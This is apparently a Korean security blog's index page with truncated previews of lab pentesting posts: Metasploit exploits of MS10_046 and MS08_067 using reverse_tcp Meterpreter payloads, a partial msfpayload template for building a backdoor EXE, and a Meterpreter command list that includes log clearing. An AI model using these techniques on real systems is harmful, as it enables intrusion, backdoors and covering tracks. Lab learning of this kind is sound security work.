본문 바로가기

[Docs] Cracking Windows XP/7/8 Account Password 보호되어 있는 글입니다. 더보기
[Pentesting] Windows 7 Exploit with ms10_046 - Windows 7 Exploit with ms10_046 Vulnerability : MS10_046 PayLoad : windows/meterpreter/reverse_tcp Platforms : Windows Architectures : x86 Target : 192.168.0.2 ( Windows 7 Home Premium K sp1 ) Attacker : 192.168.233.131 ( Windows7 Ultimate sp1 ) - Process - This time we will use vuln called MS10_046 MS10_046 : Shell Link Code Execution , Using specially controled go-to-icon, Executing Remote c.. 더보기
[Pentesting] XP sp3 Remote Exploit with ms08_067 - XP sp3 Remote Exploit with ms08_067 Vulnerability : MS08_067 PayLoad : windows/vcninject/reverse_tcp Platforms : Windows Architectures : x86 Target : 192.168.233.130 ( Windows XP sp3 ) Attacker : 192.168.233.129 ( Linux BackTrack5-R3 ) - Process - This time we will exploit Windows XP sp3 with ms08_067 vulnerability MS08_067 : When the system is requested RPC request, it allows Remote Code Exec.. 더보기
[Pentesting] XP sp3 Exploit with Backdoor - Exploit Windows XP sp3 with Backdoor PayLoad : windows/meterpreter/reverse_tcp Platforms : Windows Architectures : x86 Target : 192.168.233.130 ( Windows XP sp3 ) Attacker : 192.168.233.129 ( Linux BackTrack5-R3 ) - Process - 1. Using windows/meterpreter/reverse_tcp payload, to make backdoor [ "msfencode -l" cmd ] msfpayload [PayLoad] [LHOST= ] [LPORT= ] x -> Creating EXE file which executes s.. 더보기
[Pentesting] Meterpreter Command List - Meterpreter Command - help : means help ... haha cd [path] : move path pwd : print currnet path cat [file] : opening file with text mode download [file] : donwload file upload [file] : upload file clearev : cleaning history edit [file] : editing file idletime : showing your remote control time ipconfig : showing ip address ls [option] : showing file list ps : getting current process informatio.. 더보기